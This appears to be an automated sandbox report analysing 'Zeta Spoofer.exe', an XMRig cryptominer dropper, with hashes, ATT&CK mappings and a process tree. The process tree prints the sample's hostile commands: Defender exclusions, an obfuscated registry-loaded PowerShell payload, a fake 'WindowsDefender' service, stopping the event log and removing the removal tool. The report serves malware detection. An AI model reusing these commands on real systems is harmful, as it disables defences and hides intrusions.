Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
02/02/2025, 18:35
Behavioral task
behavioral1
Sample
Zeta Spoofer.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Zeta Spoofer.exe
Resource
win10v2004-20250129-en
General
-
Target
Zeta Spoofer.exe
-
Size
16.6MB
-
MD5
58c13144b662425b9373d0687fd6c291
-
SHA1
0664e627b6539d3ad79cb43d8e3131d5f3bb5b6a
-
SHA256
57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9
-
SHA512
c2534c081a34c2f825c59a926c95cdf00c1b23da2290581380c6ad1aa25523cba8e2346c0e54c2b56a7725eda862a2531828ed80edc93e37db9044c41039c960
-
SSDEEP
393216:5SDLxiW3R0mP1RmUh/ObTeJQlIvfcciFRM3P2lWVPNL+9m+O/:5oLRR0u1RmEOu0Ivfb3NNLz+
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2740 created 432 2740 powershell.EXE 5 -
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/2532-1038-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2532-1039-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2532-1036-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2532-1035-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2532-1040-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2532-1042-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2532-1041-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1788 powershell.exe 2964 powershell.exe 2740 powershell.EXE -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts ZetaSpoofer.exe File created C:\Windows\system32\drivers\etc\hosts Defenderupdates.exe -
Stops running service(s) 4 TTPs
-
Executes dropped EXE 5 IoCs
pid Process 2916 Zeta.exe 2840 ZetaSpoofer.exe 664 Zeta.exe 476 services.exe 2604 Defenderupdates.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 2612 Zeta Spoofer.exe 2612 Zeta Spoofer.exe 2916 Zeta.exe 664 Zeta.exe 476 services.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2948 powercfg.exe 2140 powercfg.exe 2448 powercfg.exe 2100 powercfg.exe 2468 powercfg.exe 1016 powercfg.exe 2556 powercfg.exe 2820 powercfg.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe ZetaSpoofer.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\MRT.exe Defenderupdates.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2840 set thread context of 1484 2840 ZetaSpoofer.exe 42 PID 2604 set thread context of 2872 2604 Defenderupdates.exe 66 PID 2604 set thread context of 2944 2604 Defenderupdates.exe 72 PID 2604 set thread context of 2532 2604 Defenderupdates.exe 73 PID 2740 set thread context of 2164 2740 powershell.EXE 75 -
resource yara_rule behavioral1/memory/2532-1034-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1031-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1032-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1033-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1038-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1039-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1036-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1035-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1030-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1040-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1042-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2532-1041-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2412 sc.exe 2600 sc.exe 784 sc.exe 920 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000c00000001202c-5.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Zeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Zeta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40b5d04fa175db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2840 ZetaSpoofer.exe 1788 powershell.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2840 ZetaSpoofer.exe 2604 Defenderupdates.exe 2964 powershell.exe 2740 powershell.EXE 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2604 Defenderupdates.exe 2740 powershell.EXE 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1196 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1788 powershell.exe Token: SeShutdownPrivilege 2556 powercfg.exe Token: SeShutdownPrivilege 1016 powercfg.exe Token: SeShutdownPrivilege 2468 powercfg.exe Token: SeShutdownPrivilege 2100 powercfg.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 2740 powershell.EXE Token: SeShutdownPrivilege 2448 powercfg.exe Token: SeShutdownPrivilege 2948 powercfg.exe Token: SeShutdownPrivilege 2140 powercfg.exe Token: SeShutdownPrivilege 2820 powercfg.exe Token: SeLockMemoryPrivilege 2532 dialer.exe Token: SeDebugPrivilege 2740 powershell.EXE Token: SeDebugPrivilege 2164 dllhost.exe Token: SeShutdownPrivilege 1196 Explorer.EXE Token: SeShutdownPrivilege 1196 Explorer.EXE Token: SeShutdownPrivilege 1196 Explorer.EXE Token: SeShutdownPrivilege 1196 Explorer.EXE Token: SeShutdownPrivilege 1196 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 760 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2612 wrote to memory of 2916 2612 Zeta Spoofer.exe 30 PID 2612 wrote to memory of 2916 2612 Zeta Spoofer.exe 30 PID 2612 wrote to memory of 2916 2612 Zeta Spoofer.exe 30 PID 2612 wrote to memory of 2916 2612 Zeta Spoofer.exe 30 PID 2612 wrote to memory of 2840 2612 Zeta Spoofer.exe 31 PID 2612 wrote to memory of 2840 2612 Zeta Spoofer.exe 31 PID 2612 wrote to memory of 2840 2612 Zeta Spoofer.exe 31 PID 2916 wrote to memory of 664 2916 Zeta.exe 32 PID 2916 wrote to memory of 664 2916 Zeta.exe 32 PID 2916 wrote to memory of 664 2916 Zeta.exe 32 PID 2916 wrote to memory of 664 2916 Zeta.exe 32 PID 2840 wrote to memory of 1484 2840 ZetaSpoofer.exe 42 PID 2840 wrote to memory of 1484 2840 ZetaSpoofer.exe 42 PID 2840 wrote to memory of 1484 2840 ZetaSpoofer.exe 42 PID 2840 wrote to memory of 1484 2840 ZetaSpoofer.exe 42 PID 2840 wrote to memory of 1484 2840 ZetaSpoofer.exe 42 PID 2840 wrote to memory of 1484 2840 ZetaSpoofer.exe 42 PID 1104 wrote to memory of 1680 1104 cmd.exe 48 PID 1104 wrote to memory of 1680 1104 cmd.exe 48 PID 1104 wrote to memory of 1680 1104 cmd.exe 48 PID 1872 wrote to memory of 2740 1872 taskeng.exe 59 PID 1872 wrote to memory of 2740 1872 taskeng.exe 59 PID 1872 wrote to memory of 2740 1872 taskeng.exe 59 PID 2604 wrote to memory of 2872 2604 Defenderupdates.exe 66 PID 2604 wrote to memory of 2872 2604 Defenderupdates.exe 66 PID 2604 wrote to memory of 2872 2604 Defenderupdates.exe 66 PID 2604 wrote to memory of 2872 2604 Defenderupdates.exe 66 PID 2604 wrote to memory of 2872 2604 Defenderupdates.exe 66 PID 2604 wrote to memory of 2872 2604 Defenderupdates.exe 66 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2944 2604 Defenderupdates.exe 72 PID 2604 wrote to memory of 2532 2604 Defenderupdates.exe 73 PID 2604 wrote to memory of 2532 2604 Defenderupdates.exe 73 PID 2604 wrote to memory of 2532 2604 Defenderupdates.exe 73 PID 2604 wrote to memory of 2532 2604 Defenderupdates.exe 73 PID 2604 wrote to memory of 2532 2604 Defenderupdates.exe 73 PID 2784 wrote to memory of 2444 2784 cmd.exe 74 PID 2784 wrote to memory of 2444 2784 cmd.exe 74 PID 2784 wrote to memory of 2444 2784 cmd.exe 74 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2740 wrote to memory of 2164 2740 powershell.EXE 75 PID 2164 wrote to memory of 432 2164 dllhost.exe 5 PID 2164 wrote to memory of 476 2164 dllhost.exe 6 PID 2164 wrote to memory of 492 2164 dllhost.exe 7 PID 2164 wrote to memory of 500 2164 dllhost.exe 8 PID 2164 wrote to memory of 608 2164 dllhost.exe 9 PID 2164 wrote to memory of 692 2164 dllhost.exe 10 PID 2164 wrote to memory of 760 2164 dllhost.exe 11 PID 2164 wrote to memory of 840 2164 dllhost.exe 12 PID 2164 wrote to memory of 880 2164 dllhost.exe 13 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ca9a423c-30a4-4d41-9d38-574e46db68bb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:476 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:608
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1520
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1684
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:692
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
- Indicator Removal: Clear Windows Event Logs
- Suspicious use of UnmapMainImage
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:840
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1128
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:880
-
C:\Windows\system32\taskeng.exetaskeng.exe {4F9A0BC0-4AA2-472B-B530-DD068FCE520D} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:984
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:340
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1064
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1072
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1152
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1452
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2276
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2320
-
-
C:\ProgramData\Defenderupdates.exeC:\ProgramData\Defenderupdates.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2444
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2872
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2944
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\Zeta.exe"C:\Users\Admin\AppData\Local\Temp\Zeta.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\Zeta.exe"C:\Users\Admin\AppData\Local\Temp\Zeta.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:664
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:1680
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:1484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsDefender"4⤵
- Launches sc.exe
PID:784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"4⤵
- Launches sc.exe
PID:920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsDefender"4⤵
- Launches sc.exe
PID:2412
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "24338621699534604-1475907038-813239224-5736729012434387251625384420-325526944"1⤵PID:2384
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1237192115-14287117401215218517-85344656213212272611289441977816931871-301777549"1⤵PID:2792
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.3MB
MD5f79df4f96e90110491b16131ad54f231
SHA1307be8cf98adb6c2f359ffa67c8e9476febadd5a
SHA256817967415a85915d7d4b1ac89b3f0d0ae8c1fce55cb90d20c0893e191754ea1a
SHA512ffa198a828b57344280065036eea34e928672bbdaba6fedbf3137cd69246a265bd0fbb7803e6806e474d2c96de4dc9a9cfa0f35b617b045673759afd976ee0c9
-
Filesize
5.3MB
MD57bda2ed86f648c8528531d76f0a53f2a
SHA15c852efdb51b00cbfa0dc0ca0d017a3f52dae069
SHA256667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2
SHA512075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356
-
Filesize
4.2MB
MD52a9c5db70c6906571f2ca3a07521baa2
SHA1765fa27bbee6a02b20b14b2b78c92a880e6627e5
SHA256c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611
SHA512fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53
-
Filesize
1013B
MD527cfde53cb5a0cc9608f754760735896
SHA11610941c4bfff2f330eb8ae96006d8e216fc5ece
SHA25612df6caaf3658022c70ef87f4b39ffeaf4abb6d269cd2ba12c4d354c459c7e2f
SHA512535afd5d12005a856a44f7f7cd2a623b1c483ea4e9d63d06c610407aa45a721854c3975d4b2b4af6949d81c09151d809d521f2fe9253bf402d15869e83a6c289